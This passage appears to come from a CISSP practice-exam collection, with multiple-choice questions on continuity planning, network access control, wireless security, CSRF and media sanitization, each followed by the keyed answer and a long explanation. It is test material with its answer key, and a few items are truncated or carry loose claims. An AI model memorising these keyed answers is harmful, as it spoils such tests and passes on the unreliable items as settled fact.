Emergency procedures are the first step in the business continuity process, as they aim to protect the safety of people and assets, and to minimize the impact of the incident. Emergency procedures should be used immediately after a BCP has been invoked, as they provide guidance on how to respond to the crisis and restore critical functions as soon as possible. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Business Continuity and Disaster Recovery Planning, page 353; [Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7: Business Continuity Planning, page 487]
Which of the following is the BEST method a security practitioner can use to ensure that systems and sub-systems gracefully handle invalid input?
Unit testing
Integration testing
Negative testing
Acceptance testing
Negative testing is the best method a security practitioner can use to ensure that systems and sub-systems gracefully handle invalid input. Negative testing is a type of software testing that involves providing invalid, unexpected, or erroneous input to the system or sub-system, and verifying how it responds or handles the input. Negative testing can help to identify and eliminate bugs, errors, exceptions, and vulnerabilities in the system or sub-system, and to ensure that it does not crash, freeze, or behave unpredictably when faced with invalid input. Negative testing can also help to improve the security, reliability, and usability of the system or sub-system, and to ensure that it meets the functional and non-functional requirements34. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 10, page 882; 100 CISSP Questions, Answers and Explanations, Question 17.
Which of the following trust services principles refers to the accessibility of information used by the systems, products, or services offered to a third-party provider’s customers?
Security
Privacy
Access
Availability
Availability is the trust services principle that refers to the accessibility of information used by the systems, products, or services offered to a third-party provider’s customers. Trust services principles are the criteria and guidelines that are used to evaluate and report on the controls and processes of a service organization, such as a cloud service provider, a data center, or a payroll service. Trust services principles are based on the standards and frameworks issued by the American Institute of Certified Public Accountants (AICPA) and the Canadian Institute of Chartered Accountants (CICA). There are five trust services principles: security, availability, processing integrity, confidentiality, and privacy. Availability is the trust services principle that addresses the ability of the service organization to ensure that the systems, products, or services are accessible and operational for use by the customers as agreed or expected. Availability can be measured by various metrics, such as uptime, downtime, response time, recovery time, or service level agreements. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 20. Free daily CISSP practice questions, Question 6.
A recent information security risk assessment identified weak system access controls on mobile devices as a high me In order to address this risk and ensure only authorized staff access company information, which of the following should the organization implement?
Intrusion prevention system (IPS)
Multi-factor authentication (MFA)
Data loss protection (DLP)
Data at rest encryption
Multi-factor authentication (MFA) is a method of authentication that requires two or more independent factors to verify the identity of a user, such as something you know, something you have, or something you are. MFA can help address the risk of weak system access controls on mobile devices, as it provides a higher level of security than a single factor, such as a password. MFA can prevent unauthorized access to company information, even if the mobile device is lost, stolen, or compromised. An intrusion prevention system (IPS) is a device or software that monitors and blocks network traffic based on predefined rules or signatures. An IPS can help protect the network from external attacks, but it does not address the system access controls on mobile devices. Data loss protection (DLP) is a system or tool that prevents the unauthorized disclosure, transfer, or leakage of sensitive data. DLP can help protect the company information from being exposed, but it does not address the system access controls on mobile devices. Data at rest encryption is a technique that encrypts the data that is stored on a device or a media. Data at rest encryption can help protect the company information from being accessed, even if the mobile device is lost, stolen, or compromised, but it does not address the system access controls on mobile devices.
Which of the following attributes could be used to describe a protection mechanism of an open design methodology?
lt must be tamperproof to protect it from malicious attacks.
It can facilitate independent confirmation of the design security.
It can facilitate blackbox penetration testing.
It exposes the design to vulnerabilities and malicious attacks.
One of the attributes that could be used to describe a protection mechanism of an open design methodology is that it can facilitate independent confirmation of the design security, meaning that it can enable external parties, such as researchers, experts, or users, to verify, validate, or evaluate the security properties and features of the design, and to provide feedback, suggestions, or improvements to the design. Independent confirmation of the design security can increase the confidence and trust in the design, as well as identify and resolve any security flaws, vulnerabilities, or weaknesses in the design. It must be tamperproof to protect it from malicious attacks, it can facilitate blackbox penetration testing, and it exposes the design to vulnerabilities and malicious attacks are not attributes that could be used to describe a protection mechanism of an open design methodology, as they are either not related to the openness or transparency of the design, or they are negative or undesirable consequences of the open design methodology. References:
What is the BEST way to establish identity over the internet?
Challenge Handshake Authentication Protocol (CHAP) and strong passwords
Internet Mail Access Protocol (IMAP) with Triple Data Encryption Standard (3DES)
Remote Authentication Dial-In User Service (RADIUS) server with hardware tokens
Remote user authentication via Simple Object Access Protocol (SOAP)
The best way to establish identity over the internet is to use a Remote Authentication Dial-In User Service (RADIUS) server with hardware tokens. A RADIUS server is a server that provides centralized authentication, authorization, and accounting (AAA) services for remote or network access clients, such as users or devices that connect to a network or a system over the internet. A RADIUS server can authenticate the identity of the clients by using various methods or protocols, such as passwords, certificates, or tokens. A hardware token is a physical device, such as a smart card, a USB device, or a key fob, that generates and displays a one-time password (OTP) or a personal identification number (PIN) that is used to authenticate the identity of the client. A hardware token can provide a strong and secure way of establishing identity over the internet, as it adds an extra factor of authentication, and it makes the identity verification unpredictable and resistant to attacks or theft. Using a RADIUS server with hardware tokens is the best way to establish identity over the internet, as it combines the advantages of centralized and standardized AAA services, and the benefits of strong and secure authentication methods. Challenge Handshake Authentication Protocol (CHAP) and strong passwords, Internet Mail Access Protocol (IMAP) with Triple Data Encryption Standard (3DES), and remote user authentication via Simple Object Access Protocol (SOAP) are not the best ways to establish identity over the internet, as they are either not as effective or not as efficient as using a RADIUS server with hardware tokens, or they serve different purposes or functions than establishing identity over the internet. References:
Which of the following vulnerabilities can be BEST detected using automated analysis?
Valid cross-site request forgery (CSRF) vulnerabilities
Multi-step process attack vulnerabilities
Business logic flaw vulnerabilities
Typical source code vulnerabilities
The type of vulnerabilities that can be best detected using automated analysis is typical source code vulnerabilities. Automated analysis is a technique that uses automated tools or software to analyze or test a system or an application, and to identify or report any errors, defects, or vulnerabilities. Automated analysis can be performed at different stages of the system or application development life cycle, such as design, coding, testing, or deployment. Typical source code vulnerabilities are the vulnerabilities that are common or frequent in the source code of a system or an application, and that are caused by coding errors, mistakes, or bad practices, such as buffer overflow, integer overflow, memory leak, or hard-coded credentials. Typical source code vulnerabilities can be best detected using automated analysis, as they can be easily scanned, checked, or verified by the automated tools or software, and they can be reported or corrected in a timely and efficient manner. Valid cross-site request forgery (CSRF) vulnerabilities, multi-step process attack vulnerabilities, or business logic flaw vulnerabilities are not the types of vulnerabilities that can be best detected using automated analysis, as they are more complex or specific in the system or the application, and they may require human intervention or judgment to analyze or test. Valid CSRF vulnerabilities are the vulnerabilities that allow an attacker to force a web browser to perform an unwanted or malicious action on a web server, such as transferring funds, changing passwords, or updating profiles, by exploiting the trust between the web browser and the web server. Multi-step process attack vulnerabilities are the vulnerabilities that allow an attacker to compromise a system or an application that involves multiple steps or stages, such as authentication, authorization, or transaction, by exploiting the weaknesses or gaps in each step or stage. Business logic flaw vulnerabilities are the vulnerabilities that allow an attacker to manipulate or bypass the business rules or the logic of a system or an application, such as workflows, validations, or calculations, by exploiting the flaws or errors in the design or the implementation of the system or the application. References: Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 21: Software Development Security, page 2010.
As part of the security assessment plan, the security professional has been asked to use a negative testing strategy on a new website. Which of the following actions would be performed?
Use a web scanner to scan for vulnerabilities within the website.
Perform a code review to ensure that the database references are properly addressed.
Establish a secure connection to the web server to validate that only the approved ports are open.
Enter only numbers in the web form and verify that the website prompts the user to enter a valid input.
A negative testing strategy is a type of software testing that aims to verify how the system handles invalid or unexpected inputs, errors, or conditions. A negative testing strategy can help identify potential bugs, vulnerabilities, or failures that could compromise the functionality, security, or usability of the system. One example of a negative testing strategy is to enter only numbers in a web form that expects a text input, such as a name or an email address, and verify that the website prompts the user to enter a valid input. This can help ensure that the website has proper input validation and error handling mechanisms, and that it does not accept or process any malicious or malformed data. A web scanner, a code review, and a secure connection are not examples of a negative testing strategy, as they do not involve providing invalid or unexpected inputs to the system.
What MUST each information owner do when a system contains data from multiple information owners?
Provide input to the Information System (IS) owner regarding the security requirements of the data
Review the Security Assessment report (SAR) for the Information System (IS) and authorize the IS to
operate.
Develop and maintain the System Security Plan (SSP) for the Information System (IS) containing the data
Move the data to an Information System (IS) that does not contain data owned by other information
owners
The information owner is the person who has the authority and responsibility for the data stored, processed, or transmitted by an Information System (IS). When a system contains data from multiple information owners, each information owner must provide input to the IS owner regarding the security requirements of the data, such as the classification, sensitivity, retention, and disposal of the data. The IS owner is the person who has the authority and responsibility for the operation and maintenance of the IS. The IS owner must ensure that the security requirements of the data are met and that the IS complies with the applicable laws and regulations. Reviewing the Security Assessment Report (SAR), developing and maintaining the System Security Plan (SSP), and moving the data to another IS are not the responsibilities of the information owner, but they may involve the information owner’s participation or approval. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Within the company, desktop clients receive Internet Protocol (IP) address over Dynamic Host Configuration
Protocol (DHCP).
Which of the following represents a valid measure to help protect the network against unauthorized access?
Implement path management
Implement port based security through 802.1x
Implement DHCP to assign IP address to server systems
Implement change management
Port based security through 802.1x is a valid measure to help protect the network against unauthorized access. 802.1x is an IEEE standard for port-based network access control (PNAC). It provides an authentication mechanism to devices wishing to attach to a LAN or WLAN. 802.1x authentication involves three parties: a supplicant, an authenticator, and an authentication server. The supplicant is a client device that wishes to access the network. The authenticator is a network device that provides a data link between the client and the network and can allow or block network traffic between the two, such as an Ethernet switch or wireless access point. The authentication server is a trusted server that can receive and respond to requests for network access, and can tell the authenticator if the connection is to be allowed, and various settings that should apply to that client’s connection. By implementing port based security through 802.1x, the network can prevent unauthorized devices from accessing the network resources and ensure that only authenticated and authorized devices can communicate on the network. References: IEEE 802.1X - Wikipedia; What Is 802.1X Authentication? How Does 802.1x Work? - Fortinet; 802.1X: Port-Based Network Access Control - IEEE 802
Which of the following is the MOST appropriate action when reusing media that contains sensitive data?
Erase
Sanitize
Encrypt
Degauss
The most appropriate action when reusing media that contains sensitive data is to sanitize the media. Sanitization is the process of removing or destroying all data from the media in such a way that it cannot be recovered by any means. Sanitization can be achieved by various methods, such as overwriting, degaussing, or physical destruction. Sanitization ensures that the sensitive data is not exposed or compromised when the media is reused or disposed of. Erase, encrypt, and degauss are not the most appropriate actions when reusing media that contains sensitive data, although they may be related or useful steps. Erase is the process of deleting data from the media by using the operating system or application commands or functions. Erase does not guarantee that the data is completely removed from the media, as it may leave traces or remnants that can be recovered by using special tools or techniques. Encrypt is the process of transforming data into an unreadable form by using a cryptographic algorithm and a key. Encrypt can protect the data from unauthorized access or disclosure, but it does not remove the data from the media. Encrypt also requires that the key is securely managed and stored, and that the encryption algorithm is strong and reliable. Degauss is the process of applying a strong magnetic field to the media to erase or scramble the data. Degauss can effectively sanitize magnetic media, such as hard disks or tapes, but it does not work on optical media, such as CDs or DVDs. Degauss also renders the media unusable, as it destroys the servo tracks and the firmware that are needed for the media to function properly.
A security practitioner is tasked with securing the organization’s Wireless Access Points (WAP). Which of these is the MOST effective way of restricting this environment to authorized users?
Enable Wi-Fi Protected Access 2 (WPA2) encryption on the wireless access point
Disable the broadcast of the Service Set Identifier (SSID) name
Change the name of the Service Set Identifier (SSID) to a random value not associated with the organization
Create Access Control Lists (ACL) based on Media Access Control (MAC) addresses
The most effective way of restricting the wireless environment to authorized users is to enable Wi-Fi Protected Access 2 (WPA2) encryption on the wireless access point. WPA2 is a security protocol that provides confidentiality, integrity, and authentication for wireless networks. WPA2 uses Advanced Encryption Standard (AES) to encrypt the data transmitted over the wireless network, and prevents unauthorized users from intercepting or modifying the traffic. WPA2 also uses a pre-shared key (PSK) or an Extensible Authentication Protocol (EAP) to authenticate the users who want to join the wireless network, and prevents unauthorized users from accessing the network resources. WPA2 is the current standard for wireless security and is widely supported by most wireless devices. The other options are not as effective as WPA2 encryption for restricting the wireless environment to authorized users. Disabling the broadcast of the SSID name is a technique that hides the name of the wireless network from being displayed on the list of available networks, but it does not prevent unauthorized users from discovering the name by using a wireless sniffer or a brute force tool. Changing the name of the SSID to a random value not associated with the organization is a technique that reduces the likelihood of being targeted by an attacker who is looking for a specific network, but it does not prevent unauthorized users from joining the network if they know the name and the password. Creating ACLs based on MAC addresses is a technique that allows or denies access to the wireless network based on the physical address of the wireless device, but it does not prevent unauthorized users from spoofing a valid MAC address or bypassing the ACL by using a wireless bridge or a repeater. References: Secure Wireless Access Points - Fortinet; Configure Wireless Security Settings on a WAP - Cisco; Best WAP of 2024 | TechRadar.
A chemical plan wants to upgrade the Industrial Control System (ICS) to transmit data using Ethernet instead of RS422. The project manager wants to simplify administration and maintenance by utilizing the office network infrastructure and staff to implement this upgrade.
Which of the following is the GREATEST impact on security for the network?
The network administrators have no knowledge of ICS
The ICS is now accessible from the office network
The ICS does not support the office password policy
RS422 is more reliable than Ethernet
The greatest impact on security for the network is that the ICS is now accessible from the office network. This means that the ICS is exposed to more potential threats and vulnerabilities from the internet and the office network, such as malware, unauthorized access, data leakage, or denial-of-service attacks. The ICS may also have different security requirements and standards than the office network, such as availability, reliability, and safety. Therefore, connecting the ICS to the office network increases the risk of compromising the confidentiality, integrity, and availability of the ICS and the critical infrastructure it controls. The other options are not as significant as the increased attack surface and complexity of the network. References: Guide to Industrial Control Systems (ICS) Security | NIST, page 2-1; Industrial Control Systems | Cybersecurity and Infrastructure Security Agency, page 1.
As part of an application penetration testing process, session hijacking can BEST be achieved by which of the following?
Known-plaintext attack
Denial of Service (DoS)
Cookie manipulation
Structured Query Language (SQL) injection
Cookie manipulation is a technique that allows an attacker to intercept, modify, or forge a cookie, which is a piece of data that is used to maintain the state of a web session. By manipulating the cookie, the attacker can hijack the session and gain unauthorized access to the web application. Known-plaintext attack, DoS, and SQL injection are not directly related to session hijacking, although they can be used for other purposes, such as breaking encryption, disrupting availability, or executing malicious commands. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6: Communication and Network Security, page 729; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 4: Communication and Network Security, page 522.
“Stateful” differs from “Static” packet filtering firewalls by being aware of which of the following?
Difference between a new and an established connection
Originating network location
Difference between a malicious and a benign packet payload
Originating application session
Stateful firewalls differ from static packet filtering firewalls by being aware of the difference between a new and an established connection. A stateful firewall is a firewall that keeps track of the state of network connections and transactions, and uses this information to make filtering decisions. A stateful firewall maintains a state table that records the source and destination IP addresses, port numbers, protocols, and sequence numbers of each connection. A stateful firewall can distinguish between a new connection, which requires a three-way handshake to be completed, and an established connection, which has already completed the handshake and is ready to exchange data. A stateful firewall can also detect when a connection is terminated or idle, and remove it from the state table. A stateful firewall can provide more security and efficiency than a static packet filtering firewall, which only examines the header of each packet and compares it to a set of predefined rules. A static packet filtering firewall does not keep track of the state of connections, and cannot differentiate between new and established connections. A static packet filtering firewall may allow or block packets based on the source and destination IP addresses, port numbers, and protocols, but it cannot inspect the payload or the sequence numbers of the packets. A static packet filtering firewall may also be vulnerable to spoofing or flooding attacks, as it cannot verify the authenticity or validity of the packets. The other options are not aspects that stateful firewalls are aware of, but static packet filtering firewalls are not. Both types of firewalls can check the originating network location of the packets, but they cannot check the difference between a malicious and a benign packet payload, or the originating application session of the packets. References: Stateless vs Stateful Packet Filtering Firewalls - GeeksforGeeks; Stateful vs Stateless Firewall: Differences and Examples - Fortinet; Stateful Inspection Firewalls Explained - Palo Alto Networks.
Which of the following is a responsibility of the information owner?
Ensure that users and personnel complete the required security training to access the Information System
(IS)
Defining proper access to the Information System (IS), including privileges or access rights
Managing identification, implementation, and assessment of common security controls
Ensuring the Information System (IS) is operated according to agreed upon security requirements
One of the responsibilities of the information owner is to define proper access to the Information System (IS), including privileges or access rights. This involves determining who can access the data, what they can do with the data, and under what conditions they can access the data. The information owner must also approve or deny the access requests and periodically review the access rights. Ensuring that users and personnel complete the required security training, managing the common security controls, and ensuring the IS is operated according to the security requirements are not the responsibilities of the information owner, but they may involve the information owner’s collaboration or consultation. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Which of the following provides the MOST comprehensive filtering of Peer-to-Peer (P2P) traffic?
Application proxy
Port filter
Network boundary router
Access layer switch
An application proxy provides the most comprehensive filtering of Peer-to-Peer (P2P) traffic. P2P traffic is a type of network traffic that involves direct communication and file sharing between peers, without the need for a central server. P2P traffic can be used for legitimate purposes, such as distributed computing, content delivery, or collaboration, but it can also be used for illegal or malicious purposes, such as piracy, malware distribution, or denial-of-service attacks. P2P traffic can also consume a lot of bandwidth and degrade the performance of other network applications. Therefore, it may be desirable to filter or block P2P traffic on a network. An application proxy is a type of firewall that operates at the application layer of the OSI model, and acts as an intermediary between the client and the server. An application proxy can inspect the content and the behavior of the network traffic, and apply granular filtering rules based on the specific application protocol, such as HTTP, FTP, or SMTP. An application proxy can also perform authentication, encryption, caching, and logging functions. An application proxy can provide the most comprehensive filtering of P2P traffic, as it can identify and block the P2P applications and protocols, regardless of the port number or the payload. An application proxy can also prevent P2P traffic from bypassing the firewall by using encryption or tunneling techniques. The other options are not as effective as an application proxy for filtering P2P traffic. A port filter is a type of firewall that operates at the transport layer of the OSI model, and blocks or allows traffic based on the source and destination port numbers. A port filter cannot inspect the content or the behavior of the traffic, and cannot distinguish between different applications that use the same port number. A port filter can also be easily evaded by P2P traffic that uses random or well-known port numbers, such as port 80 for HTTP. A network boundary router is a router that connects a network to another network, such as the Internet. A network boundary router can perform some basic filtering functions, such as access control lists (ACLs) or packet filtering, but it cannot inspect the content or the behavior of the traffic, and cannot apply granular filtering rules based on the specific application protocol. A network boundary router can also be easily evaded by P2P traffic that uses encryption or tunneling techniques. An access layer switch is a switch that connects end devices, such as PCs, printers, or servers, to the network. An access layer switch can perform some basic filtering functions, such as MAC address filtering or port security, but it cannot inspect the content or the behavior of the traffic, and cannot apply granular filtering rules based on the specific application protocol. An access layer switch can also be easily evaded by P2P traffic that uses encryption or tunneling techniques. References: Why and how to control peer-to-peer traffic | Network World; Detection and Management of P2P Traffic in Networks using Artificial Neural Networksa | Journal of Network and Systems Management; Blocking P2P And File Sharing - Cisco Meraki Documentation.
When conducting a security assessment of access controls, which activity is part of the data analysis phase?
Present solutions to address audit exceptions.
Conduct statistical sampling of data transactions.
Categorize and identify evidence gathered during the audit.
Collect logs and reports.
The activity that is part of the data analysis phase when conducting a security assessment of access controls is to categorize and identify evidence gathered during the audit. A security assessment of access controls is a process that evaluates the effectiveness and compliance of the access controls implemented in a system or an organization. A security assessment of access controls typically consists of four phases: planning, data collection, data analysis, and reporting. The data analysis phase is the phase where the collected data is processed, interpreted, and evaluated, based on the audit objectives, criteria, and standards. The data analysis phase involves activities such as categorizing and identifying evidence gathered during the audit, which means sorting and labeling the data according to their type, source, and relevance, and verifying their validity, reliability, and sufficiency. Presenting solutions to address audit exceptions, conducting statistical sampling of data transactions, and collecting logs and reports are not activities that are part of the data analysis phase, but of the reporting, data collection, and data collection phases, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 75; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 67.
Why is planning in Disaster Recovery (DR) an interactive process?
It details off-site storage plans
It identifies omissions in the plan
It defines the objectives of the plan
It forms part of the awareness process
Planning in Disaster Recovery (DR) is an interactive process because it identifies omissions in the plan. DR planning is the process of developing and implementing procedures and processes to ensure that an organization can quickly resume its critical functions after a disaster or a disruption. DR planning involves various steps, such as conducting a risk assessment, performing a business impact analysis, defining the recovery objectives and strategies, designing and developing the DR plan, testing and validating the DR plan, and maintaining and updating the DR plan. DR planning is an interactive process because it requires constant feedback and communication among the stakeholders, such as the management, the employees, the customers, the suppliers, and the regulators. DR planning also requires regular reviews and evaluations of the plan to identify and address any gaps, errors, or changes that may affect the effectiveness or the feasibility of the plan. DR planning is not an interactive process because it details off-site storage plans, defines the objectives of the plan, or forms part of the awareness process, although these may be related or important aspects of DR planning. Detailing off-site storage plans is a technique that involves storing copies of the essential data, documents, or equipment at a secure and remote location, such as a vault, a warehouse, or a cloud service. Detailing off-site storage plans can provide some benefits for DR planning, such as enhancing the availability and the integrity of the data, documents, or equipment, preventing data loss or corruption, and facilitating the recovery and the restoration process. However, detailing off-site storage plans is not the reason why DR planning is an interactive process, as it is not a feedback or a communication mechanism, and it does not identify or address any omissions in the plan. Defining the objectives of the plan is a step that involves establishing the goals and the priorities of the DR plan, such as the recovery time objective (RTO), the recovery point objective (RPO), the maximum tolerable downtime (MTD), or the minimum operating level (MOL). Defining the objectives of the plan can provide some benefits for DR planning, such as aligning the DR plan with the business needs and expectations, setting the scope and the boundaries of the DR plan, and measuring the performance and the outcomes of the DR plan. However, defining the objectives of the plan is not the reason why DR planning is an interactive process, as it is not a feedback or a communication mechanism, and it does not identify or address any omissions in the plan. Forming part of the awareness process is a technique that involves educating and informing the stakeholders about the DR plan, such as the purpose, the scope, the roles, the responsibilities, or the procedures of the DR plan. Forming part of the awareness process can provide some benefits for DR planning, such as improving the knowledge and the skills of the stakeholders, changing the attitudes and the behaviors of the stakeholders, and empowering the stakeholders to make informed and secure decisions regarding the DR plan. However, forming part of the awareness process is not the reason why DR planning is an interactive process, as it is not a feedback or a communication mechanism, and it does not identify or address any omissions in the plan.
Who is responsible for the protection of information when it is shared with or provided to other organizations?
Systems owner
Authorizing Official (AO)
Information owner
Security officer
The information owner is the person who has the authority and responsibility for the information within an Information System (IS). The information owner is responsible for the protection of information when it is shared with or provided to other organizations, such as by defining the classification, sensitivity, retention, and disposal of the information, as well as by approving or denying the access requests and periodically reviewing the access rights. The system owner, the authorizing official, and the security officer are not responsible for the protection of information when it is shared with or provided to other organizations, although they may have roles and responsibilities related to the security and operation of the IS. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Which of the following is MOST effective in detecting information hiding in Transmission Control Protocol/internet Protocol (TCP/IP) traffic?
Stateful inspection firewall
Application-level firewall
Content-filtering proxy
Packet-filter firewall
An application-level firewall is the most effective in detecting information hiding in TCP/IP traffic. Information hiding is a technique that conceals data or messages within other data or messages, such as using steganography, covert channels, or encryption. An application-level firewall is a type of firewall that operates at the application layer of the OSI model, and inspects the content and context of the network packets, such as the headers, payloads, or protocols. An application-level firewall can help to detect information hiding in TCP/IP traffic, as it can analyze the data for any anomalies, inconsistencies, or violations of the expected format or behavior. A stateful inspection firewall, a content-filtering proxy, and a packet-filter firewall are not as effective in detecting information hiding in TCP/IP traffic, as they operate at lower layers of the OSI model, and only inspect the state, content, or header of the network packets, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6: Communication and Network Security, page 731; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 4: Communication and Network Security, page 511.
When determining who can accept the risk associated with a vulnerability, which of the following is the MOST important?
Countermeasure effectiveness
Type of potential loss
Incident likelihood
Information ownership
Information ownership is the most important factor when determining who can accept the risk associated with a vulnerability. Information ownership is the concept that assigns the roles and responsibilities for the creation, maintenance, protection, and disposal of information assets within an organization. Information owners are the individuals or entities who have the authority and accountability for the information assets, and who can make decisions regarding the information lifecycle, classification, access, and usage. Information owners are also responsible for accepting or rejecting the risk associated with the information assets, and for ensuring that the risk is managed and communicated appropriately. Information owners can delegate some of their responsibilities to other roles, such as information custodians, information users, or information stewards, but they cannot delegate their accountability for the information assets and the associated risk. Countermeasure effectiveness, type of potential loss, and incident likelihood are not the most important factors when determining who can accept the risk associated with a vulnerability, although they are relevant or useful factors. Countermeasure effectiveness is the measure of how well a security control reduces or eliminates the risk. Countermeasure effectiveness can help to evaluate the cost-benefit and performance of the security control, and to determine the level of residual risk. Type of potential loss is the measure of the adverse impact or consequence that can result from a risk event. Type of potential loss can include financial, operational, reputational, legal, or strategic losses. Type of potential loss can help to assess the severity and priority of the risk, and to justify the investment and implementation of the security control. Incident likelihood is the measure of the probability or frequency of a risk event occurring. Incident likelihood can be influenced by various factors, such as the threat capability, the vulnerability exposure, the environmental conditions, or the historical data. Incident likelihood can help to estimate the level and trend of the risk, and to select the appropriate risk response and security control.
Which of the following mechanisms will BEST prevent a Cross-Site Request Forgery (CSRF) attack?
parameterized database queries
whitelist input values
synchronized session tokens
use strong ciphers
The best mechanism to prevent a Cross-Site Request Forgery (CSRF) attack is to use synchronized session tokens. A CSRF attack is a type of web application vulnerability that exploits the trust that a site has in a user’s browser. A CSRF attack occurs when a malicious site, email, or link tricks a user’s browser into sending a forged request to a vulnerable site, where the user is already authenticated. The vulnerable site cannot distinguish between the legitimate and the forged requests, and may perform an unwanted action on behalf of the user, such as changing a password, transferring funds, or deleting data. Synchronized session tokens are a technique to prevent CSRF attacks by adding a random and unique value to each request that is generated by the server and verified by the server before processing the request. The token is usually stored in a hidden form field or a custom HTTP header, and is tied to the user’s session. The token ensures that the request originates from the same site that issued it, and not from a malicious site. Synchronized session tokens are also known as CSRF tokens, anti-CSRF tokens, or state tokens. Parameterized database queries, whitelist input values, and use strong ciphers are not mechanisms to prevent CSRF attacks, although they may be useful for other types of web application vulnerabilities. Parameterized database queries are a technique to prevent SQL injection attacks by using placeholders or parameters for user input, instead of concatenating or embedding user input directly into the SQL query. Parameterized database queries ensure that the user input is treated as data and not as part of the SQL command. Whitelist input values are a technique to prevent input validation attacks by allowing only a predefined set of values or characters for user input, instead of rejecting or filtering out unwanted or malicious values or characters. Whitelist input values ensure that the user input conforms to the expected format and type. Use strong ciphers are a technique to prevent encryption attacks by using cryptographic algorithms and keys that are resistant to brute force, cryptanalysis, or other attacks. Use strong ciphers ensure that the encrypted data is confidential, authentic, and integral.
Which of the following is a direct monetary cost of a security incident?
Morale
Reputation
Equipment
Information
Equipment is a direct monetary cost of a security incident. A direct monetary cost is a cost that can be easily measured and attributed to a specific security incident, such as the cost of repairing or replacing damaged or stolen equipment, the cost of hiring external experts or consultants, the cost of paying fines or penalties, or the cost of compensating the victims or customers. Equipment is a direct monetary cost of a security incident, as the security incident may cause physical or logical damage to the equipment, such as servers, computers, routers, or firewalls, or may result in the loss or theft of the equipment. The cost of equipment can be calculated by estimating the market value, the depreciation value, or the replacement value of the equipment, as well as the cost of installation, configuration, or integration of the equipment. Morale, reputation, and information are not direct monetary costs of a security incident, although they are important and significant costs. Morale is an indirect or intangible cost of a security incident, as it affects the psychological or emotional state of the employees, customers, or stakeholders, and may lead to lower productivity, satisfaction, or loyalty. Reputation is an indirect or intangible cost of a security incident, as it affects the public perception or image of the organization, and may result in loss of trust, confidence, or credibility. Information is an indirect or intangible cost of a security incident, as it affects the value or quality of the data or knowledge of the organization, and may result in loss of confidentiality, integrity, or availability. Indirect or intangible costs are costs that are difficult to measure or quantify, and may have long-term or hidden impacts on the organization.
Which of the following is a common feature of an Identity as a Service (IDaaS) solution?
Single Sign-On (SSO) authentication support
Privileged user authentication support
Password reset service support
Terminal Access Controller Access Control System (TACACS) authentication support
Single Sign-On (SSO) is a feature that allows a user to authenticate once and access multiple applications or services without having to re-enter their credentials. SSO improves the user experience and reduces the password management burden for both users and administrators. SSO is a common feature of Identity as a Service (IDaaS) solutions, which are cloud-based services that provide identity and access management capabilities to organizations. IDaaS solutions typically support various SSO protocols and standards, such as Security Assertion Markup Language (SAML), OpenID Connect (OIDC), OAuth, and Kerberos, to enable seamless and secure integration with different applications and services, both on-premises and in the cloud.
Which of the following steps should be performed FIRST when purchasing Commercial Off-The-Shelf (COTS) software?
undergo a security assessment as part of authorization process
establish a risk management strategy
harden the hosting server, and perform hosting and application vulnerability scans
establish policies and procedures on system and services acquisition
The first step when purchasing Commercial Off-The-Shelf (COTS) software is to establish policies and procedures on system and services acquisition. This involves defining the objectives, scope, and criteria for acquiring the software, as well as the roles and responsibilities of the stakeholders involved in the acquisition process. The policies and procedures should also address the legal, contractual, and regulatory aspects of the acquisition, such as the terms and conditions, the service level agreements, and the compliance requirements. Undergoing a security assessment, establishing a risk management strategy, and hardening the hosting server are not the first steps when purchasing COTS software, but they may be part of the subsequent steps, such as the evaluation, selection, and implementation of the software. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 64; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 56.
What capability would typically be included in a commercially available software package designed for access control?
Password encryption
File encryption
Source library control
File authentication
Password encryption is a capability that would typically be included in a commercially available software package designed for access control. Password encryption is a technique that transforms the plain text passwords into unreadable ciphertexts, using a cryptographic algorithm and a key. Password encryption can help to protect the passwords from unauthorized access, disclosure, or modification, as well as to prevent password cracking or guessing attacks. File encryption, source library control, and file authentication are not capabilities related to access control, but to data protection, configuration management, and data integrity, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5: Security Engineering, page 605; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 3: Security Architecture and Engineering, page 386.
Which of the following is the MOST important part of an awareness and training plan to prepare employees for emergency situations?
Having emergency contacts established for the general employee population to get information
Conducting business continuity and disaster recovery training for those who have a direct role in the recovery
Designing business continuity and disaster recovery training programs for different audiences
Publishing a corporate business continuity and disaster recovery plan on the corporate website
The most important part of an awareness and training plan to prepare employees for emergency situations is to design business continuity and disaster recovery training programs for different audiences. This means that the training content, format, frequency, and delivery methods should be tailored to the specific needs, roles, and responsibilities of the target audience, such as senior management, business unit managers, IT staff, recovery team members, or general employees. Different audiences may have different levels of awareness, knowledge, skills, and involvement in the business continuity and disaster recovery processes, and therefore require different types of training to ensure they are adequately prepared and informed. Designing business continuity and disaster recovery training programs for different audiences can help to increase the effectiveness, efficiency, and consistency of the training, as well as the engagement, motivation, and retention of the learners. Having emergency contacts established for the general employee population to get information, conducting business continuity and disaster recovery training for those who have a direct role in the recovery, and publishing a corporate business continuity and disaster recovery plan on the corporate website are all important parts of an awareness and training plan, but they are not as important as designing business continuity and disaster recovery training programs for different audiences. Having emergency contacts established for the general employee population to get information can help to provide timely and accurate communication and guidance during an emergency situation, but it does not necessarily prepare the employees 